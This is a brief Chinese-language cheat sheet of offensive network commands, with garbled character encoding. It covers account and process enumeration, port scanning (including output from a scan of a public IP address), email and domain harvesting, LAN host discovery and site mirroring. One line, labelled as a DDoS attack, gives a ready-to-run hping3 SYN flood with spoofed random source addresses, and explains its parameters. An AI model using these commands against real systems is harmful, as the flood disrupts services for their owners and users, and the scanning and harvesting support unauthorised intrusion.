net user
tasklist | findstr “winlogon.exe”,
查找進(jìn)程名包含“winlogon.exe”的所有進(jìn)程,詳細(xì)使用方式使用tasklist/?查看。
掃描端口:amap -bq 192.168.1.1 1-1024
使用百度搜索引擎搜索 baidu相關(guān)信息:theharvester -d baidu.com -l 10 -b baidu
掃描存活主機(jī):fping -g 192.168.1.0/24
端口掃描:hping3 -8 1-1024 -S
Scanning (39.156.66.14), port 1-1024
1024 ports to scan, use -V to see all the replies
±—±----------±--------±–±----±----±----+
|port| serv name | flags |ttl| id | win | len |
±—±----------±--------±–±----±----±----+
80 http: .S…A… 128 12000 32768 48
443 https: .S…A… 128 12256 32768 48
DDOS攻擊:hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.1
-c 10000個(gè)數(shù)據(jù)表 -d 每個(gè)包大小
-w 窗口大小
發(fā)現(xiàn)局域網(wǎng)內(nèi)主機(jī):netdiscover -i eth0 -r 10.211.55.0/24
發(fā)現(xiàn)局域網(wǎng)內(nèi)主機(jī):arp-scan --interface=eth0 10.211.55.0/24
使用tcp進(jìn)行ping主機(jī):nping --tcp -p 80 --flags syn --ttl 2
httrack “” -O “+*” -v